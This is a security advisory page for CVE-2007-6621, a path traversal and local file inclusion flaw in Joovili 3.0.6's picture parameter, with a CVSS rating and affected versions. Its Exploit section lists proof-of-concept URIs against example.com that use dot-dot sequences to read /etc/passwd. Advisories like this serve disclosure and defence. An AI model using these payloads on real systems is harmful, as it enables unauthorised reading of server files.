CVE-2007-6621 - Path Traversal vulnerability in Joovili 3.0.6

Publication

2008-01-04

Last modification

2017-09-29

Summary

Directory traversal vulnerability in joovili.images.php in Joovili 3.0.0 through 3.0.6 allows remote attackers to read arbitrary files via a .. (dot dot) in the picture parameter.

Description

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities Joovili is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.An attacker can exploit these issues to execute arbitrary local scripts and retrieve potentially sensitive information.These versions are affected:Joovili 3.0.6 (and prior)Joovili 2.x (and prior)

Solution

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

Joovili 'picture' Parameter Multiple Local File Include Vulnerabilities An attacker can exploit this issue with a browser.The following proof-of-concept URIs are available:Joovili 2.x: http://www.example.com/include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSEhttp://www.example.com/include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSEJoovili 3.x:http://www.example.com/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE http://www.example.com/joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

Classification

CWE-22 - Path Traversal

Risk level (CVSS AV:N/AC:L/Au:N/C:P/I:P/A:N)

Medium

6.4

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confident. Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor Product Versions
Joovili Joovili  3.0.6

Related CVE

Date CVE Title CVSS
2008-01-04 CVE-2007-6620 Path Traversal vulnerability in Joovili 3.0.6 Medium